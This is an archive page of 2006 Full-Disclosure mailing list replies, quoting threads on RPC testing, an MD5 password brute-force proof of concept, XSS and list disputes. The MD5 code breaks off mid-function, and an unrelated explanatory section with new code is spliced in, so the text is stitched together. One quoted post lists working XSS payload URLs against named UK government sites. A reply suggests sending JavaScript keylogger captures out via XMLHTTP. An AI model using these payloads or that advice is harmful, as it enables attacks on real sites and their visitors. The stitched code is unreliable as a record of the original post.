Re: [Full-disclosure] any tools for testing RPC

2006-09-28 Thread Edward Pearson

I'm not sure there's any one product that'll do what you want.

Set up a copy of Metasploit and try to run the RPC exploits; that's probably going to give you the best coverage.

Ed

From:
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of 6ackpace
Sent: 28 September 2006 08:09
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] any tools for testing RPC

hi all,

I am testing RPC functionality in Snort. I have tried all scripts and
exploits available for RPC, but I'm not so confident and want to make sure my testing
is done perfectly, covering all aspects.

Can anyone please tell me any tools which I can rely on to test RPC?

thank you

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] md5 attack: brute force 1/3 time faster than traditional hash brute forcing

2006-08-24 Thread Edward Pearson

Ever heard of rainbow tables? Brute forcing MD5 is stone age now.

From:
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
On Behalf Of Slythers Bro
Sent: 23 August 2006 09:30
To:
full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] md5
attack: brute force 1/3 time faster than traditional hash brute forcing

/*
MD5 recomputation proof of concept
coded by overdose
[EMAIL PROTECTED]

maybe need modification for big endian
bcc32 -O2 -6 fuckmd5.cpp


E:\UnxUtils\usr\local\wbin>cat t.txt
dcvgc

E:\UnxUtils\usr\local\wbin>md5sum.exe t.txt
1c66bd6cc55e538103360ae67e5291c9 *t.txt

E:\UnxUtils\usr\local\wbin>
E:\FUCKMD5>bcc32 -O2 md5bf.cpp
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland
md5bf.cpp:
Warning W8066 md5bf.cpp 350: Unreachable code in function main(int,char * *)
Warning W8004 md5bf.cpp 351: 'compteur' is assigned a value that is never used in function main(int,char * *)
Warning W8004 md5bf.cpp 330: 'ii' is assigned a value that is never used in function main(int,char * *)
Turbo Incremental Link 5.00 Copyright (c) 1997, 2000 Borland

E:\FUCKMD5>md5bf.exe 1c66bd6cc55e538103360ae67e5291c9
MD5 recomputation proof of concept coded by overdose/[EMAIL PROTECTED] irc.worldnet.net #mwa
fuckmd5.exe hash
pass de 5 lettres
pass found : dcvgc

E:\FUCKMD5>
*/

#include <iostream.h>

#define CAR_CHAINE "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

static unsigned char PADDING[64] = {
 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

#define UINT4 unsigned int
/* F, G, H and I are the basic MD5 functions: selection, majority, parity */
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits; ROTATE_RIGHT undoes it */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
#define ROTATE_RIGHT(x, n) (((x) >> (n)) | ((x) << (32-(n))))

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
/* Rotation is separate from addition to prevent recomputation */
#define FF(a, b, c, d, x, s, ac) \
 {(a) += F ((b), (c), (d)) + (x) + (unsigned int)(ac); \
 (a) = ROTATE_LEFT ((a), (s)); \
 (a) += (b); \
 }
#define GG(a, b, c, d, x, s, ac) \
 {(a) += G ((b), (c), (d)) + (x) + (unsigned int)(ac); \
 (a) = ROTATE_LEFT ((a), (s)); \
 (a) += (b); \
 }
#define HH(a, b, c, d, x, s, ac) \
 {(a) += H ((b), (c), (d)) + (x) + (unsigned int)(ac); \
 (a) = ROTATE_LEFT ((a), (s)); \
 (a) += (b); \
 }
#define II(a, b, c, d, x, s, ac) \
 {(a) += I ((b), (c), (d)) + (x) + (unsigned int)(ac); \
 (a) = ROTATE_LEFT ((a), (s)); \
 (a) += (b); \
 }

/* RHH and RII undo one HH / II step: subtract b, rotate right, then subtract the
   round function, message word and constant the forward step added */
#define RHH(a, b, c, d, x, s, ac) \
 {(a) -= (b); \
 (a) = ROTATE_RIGHT ((a), (s)); \
 (a) -= H ((b), (c), (d)) + (x) + (unsigned int)(ac); \
 }
#define RII(a, b, c, d, x, s, ac) \
 {(a) -= (b); \
 (a) = ROTATE_RIGHT ((a), (s)); \
 (a) -= I ((b), (c), (d)) + (x) + (unsigned int)(ac); \
 }


 /* Round 1 */
#define S11 7
#define S12 12
#define S13 17
#define S14 22

 /* Round 2 */
#define S21 5
#define S22 9
#define S23 14
#define S24 20

 /* Round 3 */
#define S31 4
#define S32 11
#define S33 16
#define S34 23

 /* Round 4 */
#define S41 6
#define S42 10
#define S43 15
#define S44 21


/* Start from the final digest (buf), strip the initial-value feed-forward and
   run steps 64 down to 45 backwards, leaving the state after step 44 */
inline unsigned int FastRecompute(UINT4 *buf, UINT4 *in)
{
UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476;
d = buf[3] - d;
c = buf[2] - c;
b = buf[1] - b;
a = buf[0] - a;

RII ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */
RII ( c, d, a, b, in[ 2], S43, 718787259); /* 63 */
RII ( d, a, b, c, in[11], S42, 3174756917); /* 62 */
RII ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */
RII ( b, c, d, a, in[13], S44, 1309151649); /* 60 */
RII ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */
RII ( d, a, b, c, in[15], S42, 4264355552); /* 58: 0xfe2ce6e0 per RFC 1321; the list copy read 426432 */
RII ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */
RII ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */
RII ( c, d, a, b, in[10], S43, 4293915773); /* 55 */
RII ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */
RII ( a, b, c, d, in[12], S41, 1700485571); /* 53 */
RII ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */
RII ( c, d, a, b, in[14], S43, 2878612391); /* 51 */
RII ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */
RII ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */

RHH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */
RHH ( c, d, a, b, in[15], S33, 530742520); /* 47 */
RHH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */
RHH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */
/* 13 bits of a and 13 bits of d after step 44, packed for a quick compare */
return ((0x1fff & a) | ((0x1fff & d) << 16));

}

inline
bool FastTransform (UINT4 *buf, UINT4 *in, UINT4 lhash1,UINT4 lhash2)
{
 UINT4 a = buf[0], b = 
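The idea behind the PoC above is that every MD5 step is invertible once the message word it consumed is known: subtract the initialisation vector from the digest, undo the last steps with ROTATE_RIGHT, and a candidate password only has to be hashed forward as far as the meeting point. The following is an added example written for this page, not code from the post or from its author. It implements the forward and reverse step, checks the forward direction against the RFC 1321 test vector for "abc", and shows which part of the reversal can be shared across candidates for a 5-character password: 1-indexed steps 50..64 never read in[0], so the reversed state is computed once per last character and compared after 49 forward steps. The password "dcvgc" is taken from the transcript; the wrong guess "zzzzc" is constructed, all function names are this example's own, and the digest is recomputed here rather than copied from the transcript.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* RFC 1321 tables: per-step additive constants K[i] and rotation amounts S[i]. */
static const uint32_t K[64] = {
    0xd76aa478,0xe8c7b756,0x242070db,0xc1bdceee,0xf57c0faf,0x4787c62a,0xa8304613,0xfd469501,
    0x698098d8,0x8b44f7af,0xffff5bb1,0x895cd7be,0x6b901122,0xfd987193,0xa679438e,0x49b40821,
    0xf61e2562,0xc040b340,0x265e5a51,0xe9b6c7aa,0xd62f105d,0x02441453,0xd8a1e681,0xe7d3fbc8,
    0x21e1cde6,0xc33707d6,0xf4d50d87,0x455a14ed,0xa9e3e905,0xfcefa3f8,0x676f02d9,0x8d2a4c8a,
    0xfffa3942,0x8771f681,0x6d9d6122,0xfde5380c,0xa4beea44,0x4bdecfa9,0xf6bb4b60,0xbebfbc70,
    0x289b7ec6,0xeaa127fa,0xd4ef3085,0x04881d05,0xd9d4d039,0xe6db99e5,0x1fa27cf8,0xc4ac5665,
    0xf4292244,0x432aff97,0xab9423a7,0xfc93a039,0x655b59c3,0x8f0ccc92,0xffeff47d,0x85845dd1,
    0x6fa87e4f,0xfe2ce6e0,0xa3014314,0x4e0811a1,0xf7537e82,0xbd3af235,0x2ad7d2bb,0xeb86d391 };
static const uint8_t S[64] = {
    7,12,17,22,7,12,17,22,7,12,17,22,7,12,17,22, 5,9,14,20,5,9,14,20,5,9,14,20,5,9,14,20,
    4,11,16,23,4,11,16,23,4,11,16,23,4,11,16,23, 6,10,15,21,6,10,15,21,6,10,15,21,6,10,15,21 };
static const uint32_t IV[4] = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 };

static uint32_t rotl(uint32_t x, int n) { return (x << n) | (x >> (32 - n)); }
static uint32_t rotr(uint32_t x, int n) { return (x >> n) | (x << (32 - n)); }
static uint32_t le32(const uint8_t *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
/* Round function (F, G, H, I) and message-word index for step i in 0..63. */
static uint32_t fn(int i, uint32_t b, uint32_t c, uint32_t d) {
    return i < 16 ? (b & c) | (~b & d) : i < 32 ? (b & d) | (c & ~d) : i < 48 ? b ^ c ^ d : c ^ (b | ~d);
}
static int widx(int i) { return i < 16 ? i : i < 32 ? (5*i + 1) & 15 : i < 48 ? (3*i + 5) & 15 : (7*i) & 15; }
/* Run steps [from, to) forward on the state st = {a, b, c, d}. */
static void md5_steps(uint32_t st[4], const uint32_t M[16], int from, int to) {
    uint32_t a = st[0], b = st[1], c = st[2], d = st[3];
    for (int i = from; i < to; i++) {
        uint32_t t = a + fn(i, b, c, d) + K[i] + M[widx(i)];
        a = d; d = c; c = b; b += rotl(t, S[i]);
    }
    st[0] = a; st[1] = b; st[2] = c; st[3] = d;
}
/* Undo steps to-1 down to from: with M fixed, each step is a bijection on the state. */
static void md5_unsteps(uint32_t st[4], const uint32_t M[16], int from, int to) {
    uint32_t a = st[0], b = st[1], c = st[2], d = st[3];
    for (int i = to - 1; i >= from; i--) {
        uint32_t pb = c, pc = d, pd = a;   /* the step only rotated these three words */
        a = rotr(b - pb, S[i]) - fn(i, pb, pc, pd) - K[i] - M[widx(i)];
        b = pb; c = pc; d = pd;
    }
    st[0] = a; st[1] = b; st[2] = c; st[3] = d;
}
/* Single padded block (16 little-endian words) for a string shorter than 56 bytes. */
static int md5_block_words(const char *msg, uint32_t M[16]) {
    uint8_t buf[64] = {0};
    size_t len = strlen(msg);
    if (len >= 56) return 0;
    memcpy(buf, msg, len);
    buf[len] = 0x80;
    for (int i = 0; i < 8; i++) buf[56 + i] = (uint8_t)(((uint64_t)len * 8) >> (8 * i));
    for (int w = 0; w < 16; w++) M[w] = le32(buf + 4 * w);
    return 1;
}
/* MD5 of a short (single-block) string: 64 steps from IV, then the feed-forward. */
static int md5_short(const char *msg, uint8_t out[16]) {
    uint32_t M[16], st[4];
    if (!md5_block_words(msg, M)) return 0;
    memcpy(st, IV, sizeof st); md5_steps(st, M, 0, 64);
    for (int w = 0; w < 4; w++) for (int i = 0; i < 4; i++) out[4 * w + i] = (uint8_t)((st[w] + IV[w]) >> (8 * i));
    return 1;
}
/* Strip the feed-forward from a digest and undo the last k steps: state after step 64-k. */
static void md5_state_from_digest(const uint8_t digest[16], const uint32_t M[16], int k, uint32_t st[4]) {
    for (int w = 0; w < 4; w++) st[w] = le32(digest + 4 * w) - IV[w];
    md5_unsteps(st, M, 64 - k, 64);
}
/* Brute-force inner loop: 64-k forward steps and a compare instead of a full hash. */
static int md5_candidate_matches(const char *pw, const uint32_t mid[4], int k) {
    uint32_t M[16], st[4];
    if (!md5_block_words(pw, M)) return 0;
    memcpy(st, IV, sizeof st); md5_steps(st, M, 0, 64 - k);
    return memcmp(st, mid, sizeof st) == 0;
}
/* Known-answer check from RFC 1321: MD5("abc") = 900150983cd24fb0d6963f7d28e17f72. */
static int selftest_abc(void) {
    static const uint8_t want[16] = { 0x90,0x01,0x50,0x98,0x3c,0xd2,0x4f,0xb0,0xd6,0x96,0x3f,0x7d,0x28,0xe1,0x7f,0x72 };
    uint8_t got[16]; return md5_short("abc", got) && memcmp(got, want, 16) == 0;
}
/* For 5-character passwords, 1-indexed steps 50..64 never read in[0], so the reversed
 * mid-state from a wrong guess differing only in the first four characters ("zzzzc",
 * constructed) equals the one for the real password ("dcvgc", from the transcript). */
static int demo_shared_tail(void) {
    const int k = 15; uint8_t digest[16];
    uint32_t Mr[16], Mw[16], mid_r[4], mid_w[4];
    if (!md5_short("dcvgc", digest) || !md5_block_words("dcvgc", Mr) || !md5_block_words("zzzzc", Mw)) return 0;
    md5_state_from_digest(digest, Mr, k, mid_r);
    md5_state_from_digest(digest, Mw, k, mid_w);
    if (memcmp(mid_r, mid_w, sizeof mid_r) != 0) return 0;   /* in[0] really is unused back there */
    return md5_candidate_matches("dcvgc", mid_w, k) && !md5_candidate_matches("zzzzc", mid_w, k);
}
int main(void) {
    printf("MD5(\"abc\") known answer: %s\n", selftest_abc() ? "ok" : "FAIL");
    printf("15-step reversal shared across in[0], 49-step check: %s\n", demo_shared_tail() ? "ok" : "FAIL");
    return 0; }
```

With k = 15 the per-candidate cost drops from 64 steps to 49 plus a 128-bit compare, roughly the saving the subject line claims. The PoC's FastRecompute goes four steps further, back to step 44, which pulls in[0] (used at step 49) into the reversal, so that stretch cannot be shared across candidates and has to be redone for each one; the shareable prefix ends at step 50.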

RE: [Full-disclosure] LOL HY

2006-08-15 Thread Edward Pearson
I'm glad somebody said it. I'm fed up of the whole "if you don't like
them, don't read them" crap.

It is a security list, last week I got 1200 e-mails from FD. I think I
found around 90-100 that weren't spam/n3td3v/pr0n/assorted bullshit.

These people take the piss and generally fuck things up for those here
to learn and share.

Every few months people ask that this list become moderated, every few
months it breaks down into spam and anarchy thanks to a few wankers who
have too much time on their hands.

Fuck you all. I'm going to Bugtraq.

Anybody else looking to stop this daily mailbox cleaning, should do so
as well, it has become a FAR superior list nowadays anyway, mostly
thanks to the people here driving real users away.

Ed

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
mikeiscool
Sent: 15 August 2006 07:56
To: Matt Burnett
Cc: full-disclosure
Subject: Re: [Full-disclosure] LOL HY

On 8/15/06, Matt Burnett [EMAIL PROTECTED] wrote:
 What the fuck is my problem? I had to dl ~1MB of shitty porn, which
 prevents me from having 1.5 seconds more of decent high quality porn.
 That's my fucking problem.

 Now the real question is what the fuck is your problem? If it's so
 easy to not read these messages then why the fuck do you keep reading
 mine?

 So would you tell me what the idea of fd is? Last time I read
 the charter it was supposed to be about security. That's what the fuck
 the idea of FD is, mother fucking security, not shitty porn. Would
 you mind informing everyone here how crappy porn fits in to the idea
 of fd? BTW what is your convoluted idea of fd?

see, now THIS is good tv.

come on producers, where is the fd tv show ...

-- mic



RE: [Full-disclosure] XSS funtime

2006-08-04 Thread Edward Pearson

No dude, XSSing random sites is just lame. There is no
competition, this kinda shit belongs on http://www.elitehackers.info. Not a
SecList.

Especially http://disabilitydatabase.mla.gov.uk,
have you no shame?

Ed

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of codeslag
Sent: 03 August 2006 23:09
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] XSS funtime
http://disabilitydatabase.mla.gov.uk/index.asp?startrow=1&action=""
http://www.audit-commission.gov.uk/search/search_result.asp?txtSearchKeywords=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E
http://www.salford.gov.uk/search.htm?col=justhtml&qt=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E3E
http://www.ealing.gov.uk/search.jsp?query=%3Cimg+src%3D%22http%3A%2F%2F0xdeadface.co.uk%2Frichard.jpg%22%2F%3E&goButton=Search&index=all
http://www.successforall.gov.uk/index.cfm?pg=61&q=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E

Does this mean I win the XSS contest? After all I have h40r3d t3h g1bs0n!!11
hugs & kisses
dyn0/codeslag

RE: [Full-disclosure] CodeCrypter mutation engine

2006-07-21 Thread Edward Pearson
If you can't compile it, then how on earth do you expect to understand
how to use it? I've thought compiling was more of a required
intelligence test.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
/dev/null
Sent: 20 July 2006 12:12
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] CodeCrypter mutation engine

Hello list,

does anybody know where I can find a compiled version of the CodeCrypter
mutation engine written by Tibbar? I have tried to compile it with MS VC++6,
but it doesn't compile. In case anybody would like to try, attached is the
source code...

Thank you very much.

-E.


http://www.email.si/



RE: [Full-disclosure] The truth about Rob Levin aka Lilo of irc.freenode.net

2006-07-06 Thread Edward Pearson
Yes, shame on you.
If Rob took you to court, you'd be in big fucking trouble.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Benjamin
Krueger
Sent: 05 July 2006 22:42
To: Slotto Corleone
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] The truth about Rob Levin aka Lilo of
irc.freenode.net

Slotto Corleone wrote:
 Yes, Slotto Corleone has returned. However, this is only a message 
 I've been given to relay to the list:
 
 
 Eyeballing Rob Levin
 

Wowsa. Have you even talked to an attorney about your liability in
exposing Rob's personal information on the public internet? It's one
thing to try and discredit the man, but another (cruel and likely
unlawful) thing entirely to try and destroy his identity and/or finances
by exposing his SSN, birthdate, and other personal data. You have no
right to try and cause that kind of harm, no matter what Rob has
allegedly done. Shame on you.



RE: [Full-disclosure] Re: [WEB SECURITY] Cross Site Scripting in Google

2006-07-06 Thread Edward Pearson
For those who didn't read earlier: This isn't a bug, it's a feature.

The URL specified is DESIGNED to redirect, e-mailing Google about it is
simply going to make you look stupid.

Ed

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Javor
Ninov
Sent: 06 July 2006 06:00
To: RSnake
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED];
bugtraq@securityfocus.com; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Re: [WEB SECURITY] Cross Site Scripting
in Google



RSnake wrote:
 
 Just for the record, I should clarify. Google was not notified of this

 exploit prior to full disclosure. As I said, they are notoriously slow

 (or completely delinquent) in fixing these issues historically. If you

 need proof click here to see four redirect issues disclosed nearly 6 
 months ago that are still not fixed.
 
 http://seclists.org/lists/webappsec/2006/Jan-Mar/0066.html
 
 Here's another one:
 
 http://www.google.com/url?sa=Dq=http://www.fthe.net
 
 Typically I don't believe in full disclosure as a release methodology 
 (for instance, if I found a remote vulnerability in Microsoft, I 
 wouldn't disclose that without giving Microsoft months to release a 
 patch as they have taken their patching process very seriously as of 
 late and their responsibility in this matter has been far improved).
 Either Google was not convinced when they were used as a phishing 
 relay last time, or they do not take this seriously.  Either way, it 
 takes all but a few days to patch these issues in a website, QA them
 and release them, and Google has not done so, making contacting the
 vendor a useless exercise to date, in my opinion.
 
my opinion is that full disclosure is not for vendors .. it's for users.
full disclosure is for us to know how to react to certain threats. i
personally don't care about the vendors, although my company is a
vendor itself. we also produce software and we also care about security
of our software. but i expect users to post to security groups instead
of mailing me personally. If the vendor cares about his users he should
watch the security groups.

I believe in FULL disclosure
And i think this is the better way.

--
Javor Ninov aka DrFrancky
securitydot.net

 On Wed, 5 Jul 2006, [EMAIL PROTECTED] wrote:
 
 Did you even bother to email them and let them know? Being that 
 they're still vulnerable probably not

 - z



 Google is vulnerable to cross site scripting attacks.  I found a 
 function built off their add RSS feed function that returns HTML if 
 a valid feed is found.  It is intended as an AJAXy (dynamic 
 JavaScript
 anyway) call from an inline function and the page is intended to do 
 sanitation of the function.  However, that's too late, and it 
 returns the HTML as a query string, that is rendered, regardless of 
 the fact that it is simply a JavaScript snippet.

 Here is the post that explains the whole thing:

 http://ha.ckers.org/blog/20060704/cross-site-scripting-vulnerability
 -in-google/



 -RSnake
 http://ha.ckers.org/
 http://ha.ckers.org/xss.html
 http://ha.ckers.org/blog/feed/

 
 



 
 
 -R
 


RE: [Full-disclosure] All new anti-cyber terror website

2006-06-21 Thread Edward Pearson

I love the way you've actually defined the
word 'intelligence'.
I therefore assume most of your visitors are not
familiar with the term...

Nuff said really.

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: 14 June 2006 18:04
To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: [Full-disclosure] All new anti-cyber terror website

===

For public distribution.

===

New website launched.

===

n3td3v group launched a new website last night and is ready for web 
traffic.

===

We pride ourselves in our continued work with the underworld at Google and 
Yahoo.

===

We are a professional group of users with good intentions.

===

Learn more about the all new n3td3v website today.

===

Is your corporation Google or Yahoo? Have you ever wondered who is
behind your security incidents?...

===

Its time for n3td3v, its time for http://n3td3v.googlepages.com

===

Remember to click on the security, intelligence and network link(s) at the 
top of the website!

===

Many Thanks,

===

n3td3v

RE: [Full-disclosure] Google blocked in China?

2006-06-06 Thread Edward Pearson
The Google API release coincided nicely with China's censorship. You
can work it out ;)

Thanks Google!

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Tonnerre
Lombard
Sent: 06 June 2006 08:28
To: Alice Bryson
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Google blocked in China?

Salut,

On Tue, 2006-06-06 at 15:20 +0800, Alice Bryson wrote:
 http://www.Google.com cannot be accessed these days in China? Is it
 Google's problem or something else? Does anyone know why?

Google.com has always been blocked in the Chinese address range. There
is however a special website of Google China, but it delivers country
specific results, that is, filtered in some way. This is however
nothing unusual, just the filters applied are different for different
countries.

Google does that due to a special contract, and they do it out of their
free will.

There is however a number of hacks around this, such as the elgooG
mirror...

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Loesungen mit System
Tel: +41 61 333 80 33    Roeschenzerstrasse 9
Fax: +41 61 383 14 67    4153 Reinach
Web: www.sygroup.ch      [EMAIL PROTECTED]



RE: [Full-disclosure] abnormal behavior Gmail logon

2006-05-31 Thread Edward Pearson
This isn't abnormal or weird. It happens when your internet connection
is fairly slow, and it's because you sometimes receive incomplete headers
for the page (broken or garbled).

Ed

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Oscar
Fajardo
Sent: 30 May 2006 21:37
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] abnormal behavior Gmail logon

Because loading.html is the first HTML page you request via browser
when you log in to gmail:

GET /mail?gxlu=blah&zx=blah HTTP/1.1
POST /accounts/ServiceLoginAuth HTTP/1.1
GET /accounts/CheckCookie?continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&chtml=LoginDoneHtml HTTP/1.1
GET /mail/?auth=blah HTTP/1.1
GET /mail/?view=page&name=browser&ver=blah HTTP/1.1
GET /mail/?view=page&name=loading&ver=blah HTTP/1.1
GET /favicon.ico HTTP/1.1
GET /mail/?view=page&name=js&ver=3ee190b6dcef2cf0 HTTP/1.1

 GET /mail/html/es/loading.html HTTP/1.1

  I suppose that if he tries to get http://somehost/somepage.html the
behaviour will be the same.

  Regards.

- Original Message -
From: Brian Eaton [EMAIL PROTECTED]
To: Oscar Fajardo Sanchez [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Sent: Tuesday, May 30, 2006 10:06 PM
Subject: Re: [Full-disclosure] abnormal behavior Gmail logon


 On 5/30/06, Oscar Fajardo Sanchez [EMAIL PROTECTED] wrote:

   Take a look at:

   HKEY_CURRENT_USER\Software\Classes\.htm

   You will see FirefoxHTML **if firefox is your default browser**. The
   server is just sending a html file, which, according to the registry of
   the client machine, has to be rendered by firefox.exe

 Any idea why the OP isn't seeing this happen on every web page?

 - Brian



RE: [Full-disclosure] Black clouds over Sunnyvale go unchecked

2006-05-22 Thread Edward Pearson
What drugs are you taking, and where can I buy some? 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: 20 May 2006 19:53
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Black clouds over Sunnyvale go unchecked

yahoo hackers unite. yahoo is slowly but surely being taken over by a
bad element of yahoo employee. these employees are hired by each other
and fast tracked into sunnyvale. people say folks are vetted before they
are employed, although you can never have a check for social background,
the only checks possible are for criminal records. yahoo employee
hackers don't have criminal records, they are highly intelligent folks,
who have studied for years at universities. in real life its easier to
define a criminal, but when we're talking about international hackers,
there is no rule, there are no road signs. what is needed is
intelligence on the bad guys from a social point of view. it is all very
well using interviewing techniques, but with that, your intelligence
gathered at a job interview is only as good as the would-be employee
wants you to know.
you cannot save yourself from hackers getting into yahoo. once a hacker
is in yahoo, its very easy to gain the trust of co-workers.
once given a job, it would take a hell of a lot of evidence to unstick
them, and have grounds to fire them. i have intelligence on a social
level of someone who is a blackhat, every attempt to tip off yahoo and
make them convinced has failed, and you know what the worrying thing is,
this guy has hosted interviews and has successfully hired more hackers.
there is also intelligence that he wants in the long run to hire more
folks from a blackhat social background. i instant messaged and have
been e-mailing yahoo core security team for a sustained period over the
issue of the particular employee, who so far has managed to divert
attention from his activities by claiming everything is false being made
against him. a bunch of losers with a grudge, bored kids, you know, any
excuse the yahoo employee can think of to keep his reputation clean.
although this guy tipped off a blackhat hacker that his im conversations
were being monitored and this stopped further intelligence gathering
techniques being used on the blackhat the yahoo employee tipped off.
this tip-off wasn't hearsay, there was actual proof he tipped off a
blackhat being monitored. yahoo say for their security slogan yahoo
takes security very seriously, though when its a threat from within,
the yahoo employee is protected by his other evil blackhat friends from
within the security team. to the whitehats of yahoo, they don't even
know theres a blackhat movement going on within yahoo's work force, even
though for a long time i've been trying to convince yahoo security team
that the threat is real, and data is leaving sunnyvale and being sent to
third party contacts. this yahoo employee was originally fast tracked
into yahoo by another blackhat. since that time, the spawning of more
blackhat insiders has been continuing. eventually yahoo will have an
army of blackhat insiders letting third party contacts know exactly
whats going on. its not to say theres no money in it, often top level
google employees offer folks money for yahoo corporate data and the
likes, and of course, if the price is right then who is going to say no?



RE: [Full-disclosure] excessive xss vulnerabilities

2006-05-09 Thread Edward Pearson

Interesting, a JS keylogger! You should use XMLHTTP to
post the info...

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Christian Swartzbaugh
Sent: 09 May 2006 00:35
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] excessive xss vulnerabilities
there is a high volume of xss vulnerabilities on this list. take the
next step to disclose why xss is important for the affected program. for instance,
creating a test case that does something privileged or malicious towards a
visitor. in attempting to create a keystroke logger in JavaScript i've found it
drops random keystrokes (i think its a speed problem). and i would be interested
in seeing more malicious JavaScript. again please justify why xss is
valuable in disclosures of these vulnerabilities. even if its just a cookie
stealer, please show why an attacker would want those cookies or how he/she
could use them to create a security issue.
thanks
feofil

RE: [Full-disclosure] Gary McKinnon

2006-04-13 Thread Edward Pearson
This is what is affectionately known as political punishment. Somebody
who has nothing to do with a terrorist sect, is threatened with The Bay.

Feel big now do ya George?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: 13 April 2006 15:39
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Gary McKinnon

It is believed human rights hacktivists are set to launch a response if
British hacker Gary McKinnon is sent to Guantanamo Bay.

Symantec are set to raise their ThreatCon level to warn administrators
of the situation as the case comes to a climax next month.



RE: [Full-disclosure] (no subject)

2006-03-31 Thread Edward Pearson

n3td3v,
it's not that we doubt that you're one of the best
hackers in the ENTIRE world, nor do we doubt that your list is the finest
around. it's just that we don't care. will you please just get off the
fucking list.

Ed

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: 31 March 2006 00:11
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)

Funny you should think FD isn't already moderated, our main [EMAIL PROTECTED]
address has been moderated for months, hence the reason we're using [EMAIL PROTECTED]. This might
be an interesting read for you "freedom of speech" Americans, who are currently
bombing the hell out of the middle east to uphold, yet on FD, there is no
democracy and freedom of expression...

http://groups.google.com/group/n3td3v/browse_thread/thread/34e8f243bbddaf3e/ac7e9f73de66f10f 


http://groups.google.com/group/n3td3v/browse_thread/thread/64a322968d71fe3b/d3db5e88d9f91d88 

http://groups.google.com/group/n3td3v/msg/5b3d7afe80dde4d3

Someone tell George W Bush to drop a bomb on John Cartwright's head,
since he doesn't believe in "freedom", he must be a terrorist ;-)

We ask John Cartwright to unmoderate [EMAIL PROTECTED] or you must be with 
the terrorists... and if you don't then someone might need to tell [EMAIL PROTECTED] and then you 
